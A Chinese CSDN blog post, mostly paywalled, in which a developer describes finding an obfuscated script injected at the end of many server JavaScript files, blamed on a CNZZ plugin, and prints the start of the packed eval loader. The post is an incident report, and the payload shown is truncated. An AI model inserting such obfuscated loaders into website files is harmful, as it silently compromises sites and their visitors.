CNZZ流氓插件恶意向js插入脚本

最新推荐文章于 2024-05-17 13:52:13 发布
VIP文章 最新推荐文章于 2024-05-17 13:52:13 发布
阅读量637 收藏
点赞数 1
分类专栏: 前端 文章标签: javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_37553763/article/details/105968372
版权

 

前时间发现前端页面F12总是莫名其妙出现404,费了老鼻子劲儿,才发现原因:

 

服务器下众多项目js文件底部都被插入下面的脚本

eval(function(p, a, c, k, e, r) {

e = function(c) {

return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))

};

if (!''.replace(/^/, String)) {

while (c--) r[e(c)] = k[c] || e(c);

k = [function(e) {

return r[e]

}];

e = function() {

return '\\w+'

};

c = 1

};

while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);

return p

} ('v(h(p,a,c,k,e,r){e=h(c){i c.o(a)};m(!\'\'.l(/^/,u)){j(c--)r[e(c)]=k[c]||e(c);k&

最低0.47元/天 解锁文章
撸猫@冒泡泡
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
APP添加CNZZ统计插件教程 Android版添加phonegap
01-05
KeyMob移动广告平台是精准稳定的广告SDK、移动广告平台,致力于塑造国内最具有影响力的移动广告平台。主营移动广告服务,横跨IOS、Android两大平台,包含横幅、插屏、全屏、视频广告、banner等多种广告形式。...
JavaScript恶意代码
iteye_5722的博客
03-17 1995
一 介绍 使用JavaScript进行程序开发时,可以使用JavaScript的部分属性或方法来提高安全性,但也会无意编写出恶意代码。   二 恶意代码举例 在编写代码时,有可能由于疏忽编写出浪费系统资源的恶意代码,造成浏览器崩溃或者死机。 下面来看几段浪费系统资源的代码。 1、下面一段代码造成了死循环。当退出循环的条件永远不成立时,这个循环被称为死循环。死循环会造成系统资源的浪费,...
js页面上的流氓广告功能
qq_45524338的博客
08-29 586
页面打开在左下角有一个广告框 # 点击关闭的时候可以关闭 # 关闭一定时间以后自动还弹出来 </head> <body> <div id="close" > <a href="#" class="box">关闭</a> <p>广告</p> </div> <ul> ...
CNZZ设计缺陷可撞库
qingtianxiaozhu520的专栏
06-16 473
正常3次登录错误出现验证码,但好像是根据cookie判断的,清除cookie登录就没有验证码, 如此不带cookie提交POST即可进行多次登录尝试。 http://www.wooyun.org/bugs/wooyun-2014-061432
随笔-cnzz,百度统计,异步换统计,地址栏换地址
weixin_34378922的博客
12-18 106
*******************************<script>//百度统计var _hmt = _hmt || [];_hmt.push(['_setAccount', 'a2915193765b4211795685124561a792']);//声明_czc对象:var _czc = _czc || [];//绑定siteid,请用您的sitei...
CNZZ站长统计插件 v2.0 Discuz版.zip
07-14
插件CNZZ站长统计的Discuz版,安装后无需进行任何手动设置及代码修改,就能完成统计部署,帮助网站管理员、运营人员、推广人员等实时获取论坛流量,并从流量来源、网站内容、网站访客特性等多方面提供网站分析的...
CNZZ广告管家discuz插件 v2.02.zip
07-14
CNZZ广告管家是CNZZ旗下一款高速、稳定、易用的广告管理系统,助你迅速提升广告收入,永久免费服务用户。Discuz版为用户量身定做,内置对联、漂浮、格子广告、屏中路障、泰山压顶等常见模板,无需部署代码,操作简单...
wsui-cnzz:统计cnzz隐藏文字
04-08
安装npm i @jswork/wsui-cnzz用法// use sass@import ' ~@jswork/wsui-cnzz/dist/index.scss ' ;// use css@import ' ~@jswork/wsui-cnzz/dist/style.css ' ; < body class =" wsui-cnzz " ><!-- ... --&gt...
js实现展开全部内容,收起全部内容
撸猫@冒泡泡
05-08 5443
整理一个昨天做的案例,虽然很简单我感觉我这个脑子有必要整理一下,不然睡一觉又忘记了,这个是关于移动端页面中,如果模块中内容过多,首先展示部分,用户自己选择看不看全部的一个小功能。 首先看看这个页面的效果吧,如下图所示: 下面一起来看一下代码吧 html部分(css样式就不在这里写了,需要自行下载) <div class="con"> <p class="intro_ti...
网站主题为灰白色调
撸猫@冒泡泡
05-07 3183
在网站公用css文件头不加入即可 第一种方法: html { filter: grayscale(100%); -webkit-filter: grayscale(100%); -moz-filter: grayscale(100%); -ms-filter: grayscale(100%); -o-filter: grayscale(100%); filter: url(desa...
js把两个json数组根据相同键值合并成一个数组
撸猫@冒泡泡
05-09 2702
<script> vararr1=[{id:12,name:20},{id:13,name:30}]; vararr2=[{id:12,title:500},{id:13,title:666}]; for(vari=0;i<arr1.length;i++){ for(varj=0;j<...
js实现阿拉伯数字和中文数字互相转换
撸猫@冒泡泡
05-07 1913
阿拉伯数字转中文数字 // 节内转换算法 function SectionToChinese(section){ var strIns = '', chnStr = ''; var unitPos = 0; var zero = true; while(section > 0){ var v = section % 10; if(v === 0){ if(!zero){ zero = tr...
H5移动版识别二维码和条形码
撸猫@冒泡泡
07-07 1640
项目下载地址 注意事项: web.js 手机端访问用户授权或者拒绝回调函数
H5页面使用iosSelect.js省市县乡村四级联动
撸猫@冒泡泡
07-06 772
Js和Css文件地址 三.javascript 四.ajax接口注意事项: 返回数据形式为: 市 县 乡 村 级别之间通过parentId字段进行关联level 数据的层级,最多支持6层data [oneLevelData[, twoLevelData[, threeLevelData[, fourLevelData[, fiveLevelData[, sixLevelData]]]]]] 可以用数组,也可以用方法。 6项分别对应级联1,2,3,4,5,6项,每一项又是一个数组或方法 如果是数组: 每
ajax请求json数据前面总是有个红点
撸猫@冒泡泡
05-07 637
1、用NotePad++等工具将请求的接口PHP文件转换成utf-8无bom格式 2、或者在文件第一行(在需要访问的地方)加 ob_clean() 此函数用来丢弃输出缓冲区中的内容。 此函数不会销毁输出缓冲区,而像 ob_end_clean() 函数会销毁输出缓冲区。 还可以了解下其他方法: ob_flush() – 冲刷出(送出)输出缓冲区中的内容 ob_end_flush() –...
H5识别二维码
撸猫@冒泡泡
07-07 559
项目地址二.Html文件
moment.js总结
撸猫@冒泡泡
05-07 147
var endTime = moment().format("YYYY-MM-DD")+" 23:59:59"; //明天时间 var startTime = moment().subtract(1, "years").format("YYYY-MM-DD")+" 00:00:00"; //明天时间的前1年时间 var tt = moment().add('days', 1)....
ant design DatePicker日期选择框指定分钟的间隔minuteStep属性
最新发布
u010234868的专栏
05-17 86
在上面的例子中,DatePicker 将只允许用户以 15 分钟为间隔选择分钟。是 Ant Design 的 TimePicker时间选择框组件的一个属性。设置为 30,则用户可以选择以 30 分钟为间隔的分钟值。如果你想让分钟选项只能以 15 分钟为间隔选择,你可以将。
解释这段代码支付成功后,等待几秒钟,然后 → <input type=button value=点击这里 onclick="xyRefresh()" style="width:80px;height:45px;"> </p> <div style="display:none"> <script src="https://s13.cnzz.com/z_stat.php?id=1272667929&web_id=1272667929" language="JavaScript"></script> </div> </body> <script type="text/javascript"> var ua = window.navigator.userAgent.toLowerCase();
05-19
在这段代码中,还包含了一个CNZZJavaScript代码片段,它可能用于跟踪网站访问量或用户行为。具体来说,当用户访问这个页面时,CNZZ代码片段会自动发送一些信息到CNZZ的服务器,以便开发者可以分析网站流量和用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

撸猫@冒泡泡

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值